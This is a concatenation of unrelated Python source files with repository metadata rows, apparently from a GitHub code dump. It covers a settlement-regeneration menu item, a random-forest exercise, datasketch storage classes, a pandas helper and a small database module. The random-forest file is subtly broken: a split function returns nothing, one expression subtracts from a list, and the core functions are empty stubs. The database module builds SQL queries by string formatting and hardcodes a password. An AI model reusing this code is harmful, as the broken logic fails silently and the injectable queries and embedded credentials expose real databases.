await event.edit(animation_chars[i % 18])
| [
"noreply@github.com"
] | Hopsins.noreply@github.com |
01e664b7f39575e1a63a4ddf8b5dfefab7300952 | a2e638cd0c124254e67963bda62c21351881ee75 | /Python modules/SettlementRegenerate.py | f5f2ad83e3c14991b4f4775c28b52ee0110c5cdb | [] | no_license | webclinic017/fa-absa-py3 | 1ffa98f2bd72d541166fdaac421d3c84147a4e01 | 5e7cc7de3495145501ca53deb9efee2233ab7e1c | refs/heads/main | 2023-04-19T10:41:21.273030 | 2021-05-10T08:50:05 | 2021-05-10T08:50:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,110 | py | """----------------------------------------------------------------------------------------------------------
MODULE : SettlementRegenerate
PURPOSE : This module will regenerate a settlement.
DEPARTMENT AND DESK : IT
REQUASTER : Heinrich Cronje
DEVELOPER : Heinrich Cronje
CR NUMBER :
-------------------------------------------------------------------------------------------------------------
HISTORY
=============================================================================================================
Date Change no Developer Description
-------------------------------------------------------------------------------------------------------------
2011-08-22 Heinrich Cronje Front Arena Upgrade 2010.2.
2019-07-24 FAU-312 Cuen Edwards Replaced custom regenerate functionality with
call to Front Arena command. Added security
on menu item.
-------------------------------------------------------------------------------------------------------------
"""
import acm
from at_logging import getLogger
import FUxCore
LOGGER = getLogger(__name__)
def _confirm_regenerate(shell, settlements):
"""
Prompt the user to confirm regeneration of the currently selected
settlements.
"""
message = "The command Regenerate will be executed on the "
if settlements.Size() == 1:
message += "selected settlement."
elif settlements.Size() > 1:
message += "{number} selected settlements.".format(
number=settlements.Size()
)
message += "\n\nDo you want to continue?"
return acm.UX.Dialogs().MessageBoxYesNo(shell, 'Question', message) == 'Button1'
def _regenerate(settlements):
"""
Regenerate the specified settlements.
"""
failures = {}
for settlement in settlements:
try:
command = acm.FRegeneratePayment(settlement)
command.Execute()
command.CommitResult()
LOGGER.info('Regenerated settlement {oid}.'.format(
oid=settlement.Oid()
))
except Exception as exception:
failures[settlement] = exception
LOGGER.warn('Failed to regenerate settlement {oid}.'.format(
oid=settlement.Oid()
))
return failures
def _display_failures(shell, failures):
"""
Display a list of settlements that failed to regenerate along
with the associated exceptions.
"""
settlements = list(failures.keys())
settlements.sort(key=lambda s: s.Oid())
message = "The following settlements failed to regenerate:\n"
for settlement in settlements:
message += "\n- {oid} - {exception}".format(
oid=settlement.Oid(),
exception=failures[settlement]
)
acm.UX.Dialogs().MessageBoxOKCancel(shell, 'Warning', message)
class MenuItem(FUxCore.MenuItem):
"""
Menu item used to trigger the 'Regenerate Payment' command.
"""
def __init__(self, extension_object):
"""
Constructor.
"""
pass
@FUxCore.aux_cb
def Invoke(self, eii):
"""
Perform the action on the menu item being invoked.
"""
if not self._user_has_access():
return
shell = eii.Parameter('shell')
settlements = eii.ExtensionObject()
if _confirm_regenerate(shell, settlements):
failures = _regenerate(settlements)
if len(failures) > 0:
_display_failures(shell, failures)
@FUxCore.aux_cb
def Applicable(self):
"""
Determine whether or not the menu item should be visible
(shown at all).
"""
return self._user_has_access()
@FUxCore.aux_cb
def Enabled(self):
"""
Determine whether or not the menu item should be enabled
(vs greyed-out).
"""
return self._user_has_access()
@FUxCore.aux_cb
def Checked(self):
"""
Determine whether or not the menu item should be checked
(have a check mark).
"""
return False
@staticmethod
def _user_has_access():
"""
Determine whether or not a user should have access to the
menu item.
"""
if not acm.User().IsAllowed('Authorise Settlement', 'Operation'):
return False
if not acm.User().IsAllowed('Edit Settlements', 'Operation'):
return False
if not acm.User().IsAllowed('Regenerate Settlement', 'Operation'):
return False
return True
@FUxCore.aux_cb
def create_menu_item(extension_object):
"""
Function used to create and return the menu item.
This function is referenced from the 'Regenerate Payment'
FMenuExtension.
"""
return MenuItem(extension_object)
| [
"nencho.georogiev@absa.africa"
] | nencho.georogiev@absa.africa |
6e78e850f434cb525cb6b9cfd99f77b713019d67 | c50d9494ceb94c336d8c702f183fdd42b790fcbc | /Day-20/DecisionTree/Python/DecisionTree.py | c62792535fd7bc4c63279181e7cdaf64dd8b7224 | [] | no_license | sahilkumar4all/HMRTraining | 6469d9c566b453f73bb002306a0b231e63a1a30a | 1bb06b1e57977f209af7917385297842979add69 | refs/heads/master | 2020-06-05T16:02:51.339065 | 2019-07-30T06:27:57 | 2019-07-30T06:27:57 | 192,479,150 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,151 | py | from random import seed
from random import randrange
from csv import reader
from math import sqrt
# Load a CSV file
def load_csv(filename):
dataset = list()
with open(filename, 'r') as file:
csv_reader = reader(file)
for row in csv_reader:
if not row:
continue
dataset.append(row)
return dataset
def str_to_float(dataset):
for row in dataset:
for col in range(len(row)):
row[col] = float(row[col])
def cross_validation_split(dataset, n_folds):
dataset_split = list()
dataset_copy = list(dataset)
fold_size = int(len(dataset) / n_folds)
for i in range(n_folds):
fold = list()
while len(fold) < fold_size:
index = randrange(len(dataset_copy))
fold.append(dataset_copy.pop(index))
dataset_split.append(fold)
return dataset_split
# Calculate accuracy percentage
def accuracy_metric(actual, predicted):
correct = 0
for i in range(len(actual)):
if actual[i] == predicted[i]:
correct += 1
return correct / float(len(actual)) * 100.0
# Evaluate an algorithm using a cross validation split
def evaluate_algorithm(dataset, algorithm, n_folds, *args):
folds = cross_validation_split(dataset, n_folds)
scores = list()
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = sum(train_set, [])
test_set = list()
#add each row in a given subsample to the test set
for row in fold:
row_copy = list(row)
test_set.append(row_copy)
row_copy[-1] = None
predicted = algorithm(train_set, test_set, *args)
# print(predicted)
actual = [row[-1] for row in fold]
accuracy = accuracy_metric(actual, predicted)
scores.append(accuracy)
return scores
def gini_index(class_values, groups):
gini = 0.0
# for each class
for class_value in class_values:
# a random subset of that class
for group in groups:
size = len(group)
# to avoid divide by zero
if size == 0:
continue
# average of all class values
proportion = [row[-1] for row in group].count(class_value) / float(size)
gini += (proportion * (1.0 - proportion))
return gini
def test_split(value,index, dataset):
left, right = list(), list()
for row in dataset:
if row[index] < value:
left.append(row)
else:
right.append(row)
def get_split(dataset, n_features):
class_values = list(set([row[-1] for row in dataset]))
b_index, b_value, b_score, b_groups = 999,999,999,None
features = list()
while len(features) < n_features:
index = randrange(len(dataset[0] - 1))
if index not in features:
features.append(index)
for index in features:
for row in dataset:
groups = test_split(row[index], index, dataset)
gini = gini_index(class_values, groups)
if gini < b_score:
# print(gini)
b_index, b_value, b_score, b_groups = index, row[index], gini, groups
return {'index':b_index,'value':b_value, 'groups':b_groups}
def to_terminal():
pass
def split():
pass
def build_tree():
pass
def predict():
pass
def bagged_predict():
pass
def random_forest():
pass
dataset = [
[2.7810836,2.550537003,0],
[1.465489372,2.362125076,0],
[3.396561688,4.400293529,0],
[1.38807019,1.850220317,0],
[3.06407232,3.005305973,0],
[7.627531214,2.759262235,1],
[5.332441248,2.088626775,1],
[6.922596716,1.77106367,1],
[8.675418651,-0.242068655,1],
[7.673756466,3.508563011,1]
]
# str_to_float(dataset)
n_folds = 5
max_depth = 10
min_size = 1
sample_size = 1.0
n_features = int(sqrt(len(dataset[0])-1))
print("Number of features",n_features)
for n_trees in [1, 5, 10]:
scores = evaluate_algorithm(dataset, random_forest, n_folds, max_depth, min_size, sample_size, n_trees, n_features)
print('Trees: %d' % n_trees)
print('Scores: %s' % scores)
print('Mean Accuracy: %.3f%%' % (sum(scores)/float(len(scores)))) | [
"sahilk8285174895@gmail.com"
] | sahilk8285174895@gmail.com |
3b678ef6eb9e54417b8208f7f217443f139f13f4 | 9d6f79f2dd320347deee2e4514253c6bf9bbe821 | /lista1/zad1l1.py | 9f447f2b5378f7c5a7d924d3223c76cd76427ed6 | [] | no_license | poduszeczka3/JSP2019 | 2fa8c9b7fe10c49f14809d2b08b1fc2a12d80ed9 | 7d010415af47a0c15b009a6d0c48a8569a211ef0 | refs/heads/master | 2020-08-27T22:07:16.480123 | 2020-01-22T21:46:13 | 2020-01-22T21:46:13 | 214,391,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | print("podaj a")
a=input()
print("podaj b")
b=input()
suma=a+b
print(suma)
print("Dzięki funkcji Input zmienne 'a' oraz 'b' są traktowane jako tekst (typ: str), więc po dodaniu tworzą tekst '34'") | [
"lha120-n11@wp.pl"
] | lha120-n11@wp.pl |
e3407732dc3167a6f2ac4a77998f57b096c238ef | 30f3d476b7b8e21a1dd3209f8485c0debafb51a4 | /Experiment3/datasketch-master/datasketch-master/datasketch/storage.py | c96e7bfdf28c226244e30611057f09cb94ea5980 | [
"MIT"
] | permissive | ConquerorWolverine/Data_analysis | 3b61aa4cf6e60a5cb4d554c5ef1d7b2bf01e89c0 | 97e11f66cc51b6c976dd1043c8465f3f6c10a0a5 | refs/heads/master | 2020-11-24T18:41:41.777920 | 2019-12-18T03:29:43 | 2019-12-18T03:29:43 | 228,295,456 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,619 | py | from collections import defaultdict
import os
import random
import string
from abc import ABCMeta, abstractmethod
ABC = ABCMeta('ABC', (object,), {}) # compatible with Python 2 *and* 3
try:
import redis
except ImportError:
redis = None
def ordered_storage(config, name=None):
'''Return ordered storage system based on the specified config.
The canonical example of such a storage container is
``defaultdict(list)``. Thus, the return value of this method contains
keys and values. The values are ordered lists with the last added
item at the end.
Args:
config (dict): Defines the configurations for the storage.
For in-memory storage, the config ``{'type': 'dict'}`` will
suffice. For Redis storage, the type should be ``'redis'`` and
the configurations for the Redis database should be supplied
under the key ``'redis'``. These parameters should be in a form
suitable for `redis.Redis`. The parameters may alternatively
contain references to environment variables, in which case
literal configuration values should be replaced by dicts of
the form::
{'env': 'REDIS_HOSTNAME',
'default': 'localhost'}
For a full example, see :ref:`minhash_lsh_at_scale`
name (bytes, optional): A reference name for this storage container.
For dict-type containers, this is ignored. For Redis containers,
this name is used to prefix keys pertaining to this storage
container within the database.
'''
tp = config['type']
if tp == 'dict':
return DictListStorage(config)
if tp == 'redis':
return RedisListStorage(config, name=name)
def unordered_storage(config, name=None):
'''Return an unordered storage system based on the specified config.
The canonical example of such a storage container is
``defaultdict(set)``. Thus, the return value of this method contains
keys and values. The values are unordered sets.
Args:
config (dict): Defines the configurations for the storage.
For in-memory storage, the config ``{'type': 'dict'}`` will
suffice. For Redis storage, the type should be ``'redis'`` and
the configurations for the Redis database should be supplied
under the key ``'redis'``. These parameters should be in a form
suitable for `redis.Redis`. The parameters may alternatively
contain references to environment variables, in which case
literal configuration values should be replaced by dicts of
the form::
{'env': 'REDIS_HOSTNAME',
'default': 'localhost'}
For a full example, see :ref:`minhash_lsh_at_scale`
name (bytes, optional): A reference name for this storage container.
For dict-type containers, this is ignored. For Redis containers,
this name is used to prefix keys pertaining to this storage
container within the database.
'''
tp = config['type']
if tp == 'dict':
return DictSetStorage(config)
if tp == 'redis':
return RedisSetStorage(config, name=name)
class Storage(ABC):
'''Base class for key, value containers where the values are sequences.'''
def __getitem__(self, key):
return self.get(key)
def __delitem__(self, key):
return self.remove(key)
def __len__(self):
return self.size()
def __iter__(self):
for key in self.keys():
yield key
def __contains__(self, item):
return self.has_key(item)
@abstractmethod
def keys(self):
'''Return an iterator on keys in storage'''
return []
@abstractmethod
def get(self, key):
'''Get list of values associated with a key
Returns empty list ([]) if `key` is not found
'''
pass
def getmany(self, *keys):
return [self.get(key) for key in keys]
@abstractmethod
def insert(self, key, *vals, **kwargs):
'''Add `val` to storage against `key`'''
pass
@abstractmethod
def remove(self, *keys):
'''Remove `keys` from storage'''
pass
@abstractmethod
def remove_val(self, key, val):
'''Remove `val` from list of values under `key`'''
pass
@abstractmethod
def size(self):
'''Return size of storage with respect to number of keys'''
pass
@abstractmethod
def itemcounts(self, **kwargs):
'''Returns the number of items stored under each key'''
pass
@abstractmethod
def has_key(self, key):
'''Determines whether the key is in the storage or not'''
pass
def status(self):
return {'keyspace_size': len(self)}
def empty_buffer(self):
pass
class OrderedStorage(Storage):
pass
class UnorderedStorage(Storage):
pass
class DictListStorage(OrderedStorage):
'''This is a wrapper class around ``defaultdict(list)`` enabling
it to support an API consistent with `Storage`
'''
def __init__(self, config):
self._dict = defaultdict(list)
def keys(self):
return self._dict.keys()
def get(self, key):
return self._dict.get(key, [])
def remove(self, *keys):
for key in keys:
del self._dict[key]
def remove_val(self, key, val):
self._dict[key].remove(val)
def insert(self, key, *vals, **kwargs):
self._dict[key].extend(vals)
def size(self):
return len(self._dict)
def itemcounts(self, **kwargs):
'''Returns a dict where the keys are the keys of the container.
The values are the *lengths* of the value sequences stored
in this container.
'''
return {k: len(v) for k, v in self._dict.items()}
def has_key(self, key):
return key in self._dict
class DictSetStorage(UnorderedStorage, DictListStorage):
'''This is a wrapper class around ``defaultdict(set)`` enabling
it to support an API consistent with `Storage`
'''
def __init__(self, config):
self._dict = defaultdict(set)
def get(self, key):
return self._dict.get(key, set())
def insert(self, key, *vals, **kwargs):
self._dict[key].update(vals)
if redis is not None:
class RedisBuffer(redis.client.Pipeline):
'''A bufferized version of `redis.pipeline.Pipeline`.
The only difference from the conventional pipeline object is the
``buffer_size``. Once the buffer is longer than the buffer size,
the pipeline is automatically executed, and the buffer cleared.
'''
def __init__(self, connection_pool, response_callbacks, transaction,
shard_hint=None, buffer_size=50000):
self.buffer_size = buffer_size
super(RedisBuffer, self).__init__(
connection_pool, response_callbacks, transaction,
shard_hint=shard_hint)
def execute_command(self, *args, **kwargs):
if len(self.command_stack) >= self.buffer_size:
self.execute()
super(RedisBuffer, self).execute_command(*args, **kwargs)
class RedisStorage:
'''Base class for Redis-based storage containers.
Args:
config (dict): Redis storage units require a configuration
of the form::
storage_config={
'type': 'redis',
'redis': {'host': 'localhost', 'port': 6379}
}
one can refer to system environment variables via::
storage_config={
'type': 'redis',
'redis': {
'host': {'env': 'REDIS_HOSTNAME',
'default':'localhost'},
'port': 6379}
}
}
name (bytes, optional): A prefix to namespace all keys in
the database pertaining to this storage container.
If None, a random name will be chosen.
'''
def __init__(self, config, name=None):
self.config = config
redis_param = self._parse_config(self.config['redis'])
self._redis = redis.Redis(**redis_param)
self._buffer = RedisBuffer(self._redis.connection_pool,
self._redis.response_callbacks,
transaction=True)
if name is None:
name = _random_name(11)
self._name = name
def redis_key(self, key):
return self._name + key
def _parse_config(self, config):
cfg = {}
for key, value in config.items():
# If the value is a plain str, we will use the value
# If the value is a dict, we will extract the name of an environment
# variable stored under 'env' and optionally a default, stored under
# 'default'.
# (This is useful if the database relocates to a different host
# during the lifetime of the LSH object)
if isinstance(value, dict):
if 'env' in value:
value = os.getenv(value['env'], value.get('default', None))
cfg[key] = value
return cfg
def __getstate__(self):
state = self.__dict__.copy()
# We cannot pickle the connection objects, they get recreated
# upon unpickling
state.pop('_redis')
state.pop('_buffer')
return state
def __setstate__(self, state):
self.__dict__ = state
# Reconnect here
self.__init__(self.config, name=self._name)
class RedisListStorage(OrderedStorage, RedisStorage):
def __init__(self, config, name=None):
RedisStorage.__init__(self, config, name=name)
def keys(self):
return self._redis.hkeys(self._name)
def redis_keys(self):
return self._redis.hvals(self._name)
def status(self):
status = self._parse_config(self.config['redis'])
status.update(Storage.status(self))
return status
def get(self, key):
return self._get_items(self._redis, self.redis_key(key))
def getmany(self, *keys):
pipe = self._redis.pipeline()
pipe.multi()
for key in keys:
pipe.lrange(self.redis_key(key), 0, -1)
return pipe.execute()
@staticmethod
def _get_items(r, k):
return r.lrange(k, 0, -1)
def remove(self, *keys):
self._redis.hdel(self._name, *keys)
self._redis.delete(*[self.redis_key(key) for key in keys])
def remove_val(self, key, val):
redis_key = self.redis_key(key)
self._redis.lrem(redis_key, val)
if not self._redis.exists(redis_key):
self._redis.hdel(self._name, redis_key)
def insert(self, key, *vals, **kwargs):
# Using buffer=True outside of an `insertion_session`
# could lead to inconsistencies, because those
# insertion will not be processed until the
# buffer is cleared
buffer = kwargs.pop('buffer', False)
if buffer:
self._insert(self._buffer, key, *vals)
else:
self._insert(self._redis, key, *vals)
def _insert(self, r, key, *values):
redis_key = self.redis_key(key)
r.hset(self._name, key, redis_key)
r.rpush(redis_key, *values)
def size(self):
return self._redis.hlen(self._name)
def itemcounts(self):
pipe = self._redis.pipeline()
pipe.multi()
ks = self.keys()
for k in ks:
self._get_len(pipe, self.redis_key(k))
d = dict(zip(ks, pipe.execute()))
return d
@staticmethod
def _get_len(r, k):
return r.llen(k)
def has_key(self, key):
return self._redis.hexists(self._name, key)
def empty_buffer(self):
self._buffer.execute()
# To avoid broken pipes, recreate the connection
# objects upon emptying the buffer
self.__init__(self.config, name=self._name)
class RedisSetStorage(UnorderedStorage, RedisListStorage):
def __init__(self, config, name=None):
RedisListStorage.__init__(self, config, name=name)
@staticmethod
def _get_items(r, k):
return r.smembers(k)
def remove_val(self, key, val):
redis_key = self.redis_key(key)
self._redis.srem(redis_key, val)
if not self._redis.exists(redis_key):
self._redis.hdel(self._name, redis_key)
def _insert(self, r, key, *values):
redis_key = self.redis_key(key)
r.hset(self._name, key, redis_key)
r.sadd(redis_key, *values)
@staticmethod
def _get_len(r, k):
return r.scard(k)
def _random_name(length):
# For use with Redis, we return bytes
return ''.join(random.choice(string.ascii_lowercase)
for _ in range(length)).encode('utf8')
| [
"ConquerorWolverine@users.noreply.github.com"
] | ConquerorWolverine@users.noreply.github.com |
4dc221fddba3db1f5c8d5ed32f90622be7764621 | 80bc45b33f5282ef530fc8db208ba1528e7328b3 | /dataframe/version.py | e5848e1b65504f9848a83fd0b35446f3fd3bf984 | [] | no_license | SynapticSage/Tetromate_GoogleAssistantApplication | 5c8d185bb58bddb7d8c674e06b2e35db59a2675d | 127719b09f714d87a50b13681118fcc1f4e3bd13 | refs/heads/master | 2023-08-15T18:49:55.597746 | 2021-10-12T21:52:21 | 2021-10-12T21:52:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | # For updating older versions of the dataframe to newer versions
from tetromate_webserver import ExperimateLogger
from typing import Union
import pandas as pd
import numpy as np
def ready(df):
entrances = df.query('intent == "entrance"')
if entrances.tetrode.isnull().any() or (entrances.tetrode == -1).any():
df = upgrade_to_tetrode_labeled_entrance(df)
return df
def upgrade_to_tetrode_labeled_entrance(df:pd.DataFrame,
fix_negative_one_default_values=True):
'''
Newer versions annotate the tetrode for the entrance, rather than leaving
it blank. Blank entries were assumed to have the tetrode of the whichver
previous entry notated tetrode.
'''
df = df.copy()
df = df.reset_index()
if fix_negative_one_default_values:
x = df.loc[:,'tetrode']
x[df.tetrode == -1] = np.nan
# Pass tetrodes ahead into nan entries
df_fillforward = df.copy()
df_fillforward.tetrode.ffill(inplace=True)
# Extract entries related to entrances
chunk = df_fillforward[df_fillforward.intent == "entrance"]
df.loc[chunk.index, 'tetrode'] = chunk.tetrode
return df
| [
"ryoung@archer.feldmach.brandeis.edu"
] | ryoung@archer.feldmach.brandeis.edu |
a87b8deacee2e93a1005d2fc79a35606d155ee34 | de1a4823b44484a16e84229ef6d4c2218cebc240 | /eva_storage/src/evaluate_compression.py | 88957e992ede4f097666ed25a0086846ed9fa9b3 | [
"Apache-2.0"
] | permissive | jaehobang/Eva | b5baca7f91e3c6c6d439573430485afdfa3c05e8 | e7f649990b8bca3bc29b3832c0ecf32efb402647 | refs/heads/master | 2020-07-11T13:05:42.284943 | 2020-04-14T21:17:38 | 2020-04-14T21:17:38 | 204,546,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,974 | py | """
This file is used to evaluate the compression method of the pipeline
@Jaeho Bang
"""
import numpy as np
from loaders.uadetrac_loader import UADetracLoader
from eva_storage.preprocessingModule import PreprocessingModule
from eva_storage.UNet import UNet
from eva_storage.clusterModule import ClusterModule
from filters.minimum_filter import FilterMinimum
def get_rep_frames(images:np.ndarray, labels, image_cluster_labels):
visited_cluster_nums = set()
n_samples, height, width ,channels = images.shape
rep_images = np.zeros(shape = (max(image_cluster_labels) + 1, height, width, channels))
rep_labels = np.zeros(shape = (max(image_cluster_labels) + 1))
for i in range(len(image_cluster_labels)):
if image_cluster_labels[i] not in visited_cluster_nums:
visited_cluster_nums.add(image_cluster_labels[i])
rep_images[image_cluster_labels[i]] = images[i]
rep_labels[image_cluster_labels[i]] = labels[i]
return rep_images, rep_labels
if __name__ == "__main__":
### deprecated... moved to ipynb file
"""
loader = LoaderUADetrac()
images = loader.load_cached_images()
labels = loader.load_cached_labels()
video_start_indices = loader.get_video_start_indices()
pm = PreprocessingModule()
seg_images = pm.run(images,video_start_indices)
unet = UNet()
unet.train(images, seg_images)
unet_compressed_images, unet_segmented_images = unet.execute()
cm = ClusterModule()
image_cluster_labels = cm.run(unet_compressed_images)
rep_images, rep_labels = get_rep_frames(images, labels['vehicle'], image_cluster_labels)
## TODO: Chose the representative frames... now need to do custom_code with filters
# init a filter instance that is trained on all images
fm_everyframe = FilterMinimum()
fm_everyframe.train(images, labels['vehicle'])
fm_repframe = FilterMinimum()
fm_repframe.train(rep_images, rep_labels)
"""
| [
"jaehob@andrew.cmu.edu"
] | jaehob@andrew.cmu.edu |
5dae8c6c5b57661e6f8489ae2ea063f21b02b2f5 | aaa444183b551ba649357cef8d0f141e9f46f1e6 | /app/model.py | 7b6194770899050a3ee432b9362042af23a7612e | [] | no_license | vshevch/MapPoject | a8e3528cbbf3467d28af79b3d6610e892221a6fd | 0356de78b644f93943b374a9cd019c128b087bfb | refs/heads/master | 2020-04-04T17:31:46.565111 | 2018-12-14T03:08:11 | 2018-12-14T03:08:11 | 156,124,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import psycopg2
import queries
# Not sure how to use getDB
def getDB():
db = psycopg2.connect(
host="localhost",
database="map_project",
user="vladshev",
password="root",
)
db.autocommit = True
return db.cursor()
def addTerm(t):
db = getDB()
result = db.execute(queries.addTerm.format(t))
return result
def removeTerm(t):
db = getDB()
result = db.execute(queries.removeTerm.format(t))
return result
def allTerms():
db = getDB()
db.execute(queries.getAll)
return db.fetchall()
def allMap():
db = getDB()
db.execute(queries.getMap)
return db.fetchall()
| [
"noreply@github.com"
] | vshevch.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.